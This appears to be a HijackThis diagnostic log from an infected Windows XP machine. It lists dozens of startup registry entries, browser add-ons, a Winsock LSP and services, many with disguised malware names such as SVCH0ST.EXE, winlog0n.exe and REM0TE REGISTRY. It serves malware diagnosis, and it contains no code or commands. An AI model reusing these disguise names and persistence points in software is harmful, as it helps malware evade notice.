O3 - Toolbar: 一起搜 - {5558D3F3-87EB-4335-BE71-C6E8E468D166} - C:\Program Files\一起搜\tbu08947\cneqiso.dll (file missing)
O4 - HKLM\..\Run: [System] C:\Program Files\Common Files\System\Updaterun.exe
O4 - HKLM\..\Run: [CdnCtr] C:\Program Files\CNNIC\Cdn\cdnup.exe
O4 - HKLM\..\Run: [load] C:\WINDOWS\uninstall\rundl132.exe
O4 - HKLM\..\Run: [wtsttrs] C:\WINDOWS\wtsttrs.exe
O4 - HKLM\..\Run: [cmdbgcs] C:\WINDOWS\cmdbgcs.exe
O4 - HKLM\..\Run: [mppds] C:\WINDOWS\mppds.exe
O4 - HKLM\..\Run: [msccrt] C:\WINDOWS\msccrt.exe
O4 - HKLM\..\Run: [mhs3] C:\WINDOWS\mhs3.exe
O4 - HKLM\..\Run: [cmdbcs] C:\WINDOWS\cmdbcs.exe
O4 - HKLM\..\Run: [upxdnd] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\TIMPLATF0RM.exe
O4 - HKLM\..\Run: [wgs3] C:\WINDOWS\wgs3.exe
O4 - HKLM\..\Run: [wsttrs] C:\WINDOWS\wsttrs.exe
O4 - HKLM\..\Run: [FYNEWS] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\sl.exe
O4 - HKLM\..\Run: [spoel] C:\Program Files\Internet Explorer\spoel.exe
O4 - HKCU\..\Run: [ST0RMSetEx] C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\system\AV1CAP.dll,Run
O4 - HKCU\..\Run: [svc] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\byetmr.exe
O4 - HKCU\..\Run: [ravshell] C:\WINDOWS\System32\SVCH0ST.EXE
O4 - HKCU\..\Run: [uv4vmwwc0] C:\WINDOWS\servicea.exe
O4 - HKCU\..\Run: [miie7b7y1t51my] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlog0n.exe
O4 - HKCU\..\Run: [r9k5] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iexpl0re.exe
O4 - HKCU\..\Run: [hvygr0xm] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Servere.exe
O4 - HKCU\..\Run: [v55rkqmt6qgx4] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\crasos.exe
O4 - HKCU\..\Run: [c7kx] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rundl132.exe
O4 - HKCU\..\Run: [e5dms3e6] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\c0nime.exe
O4 - HKCU\..\Run: [1hg1t6] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iexp1ore.exe
O4 - HKCU\..\Run: [2969suv11ri9] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cftmon.exe
O4 - Global Startup: WanSo.lnk = ?

O8 - Extra context menu item: 访问通用网址 - C:\Program Files\CNNIC\Cdn\cnnic.htm
O9 - Extra button: 启动迅雷5 - {09BA8F6D-CB54-424B-839C-C2A6C8E6B436} - C:\Program Files\Thunder Network\Thunder\Thunder.exe
O9 - Extra button: 中文上网 - {5C3853CF-C7E0-4946-B3FA-1ABDB6F48108} - C:\PROGRA~1\CNNIC\Cdn\cdnforie.dll
O9 - Extra 'Tools' menuitem: 中文上网 - {5C3853CF-C7E0-4946-B3FA-1ABDB6F48108} - C:\PROGRA~1\CNNIC\Cdn\cdnforie.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\cdnns.dll
O11 - Options group: [CDNCLIENT] 中文上网
O21 - SSODL: nvwi - {D0A6302C-859C-471E-9082-6B865C0ACAA2} - C:\PROGRA~1\muvh\nvwi.dll
O23 - Service: 7A04BC6 - Unknown owner - C:\WINDOWS\System32\7A04BC6.EXE (file missing)
O23 - Service: D0622BED - Unknown owner - C:\WINDOWS\System32\D0622BED.EXE (file missing)
O23 - Service: sdhcvs (edfscv) - Unknown owner - C:\WINDOWS\System32\fgdfsdf.exe (file missing)
O23 - Service: KXAgent Service (KXAgentService) - SmartDove - C:\Program Files\LLJAgent\KXAgentS.exe

O23 - Service: Net Event - Unknown owner - C:\WINDOWS\system32\netevent.exe
O23 - Service: REM0TE REGISTRY (REM0TEREGISTRY) - Unknown owner - C:\WINDOWS\system\REM0REG.EXE

O23 - Service: Messaging (Remote Procedure) - Unknown owner - C:\WINDOWS\system32\explorcr.exe

O23 - Service: Service Transaction Provisioning (Transaction_Service) - Unknown owner - C:\WINDOWS\System32\explorer.exe
O23 - Service: Windows Login - Unknown owner - C:\WINDOWS\System32\mslogin.exe
O23 - Service: Windows Management Instrumentation Driver (WMID) - Unknown owner - C:\WINDOWS\System32\wmid.exe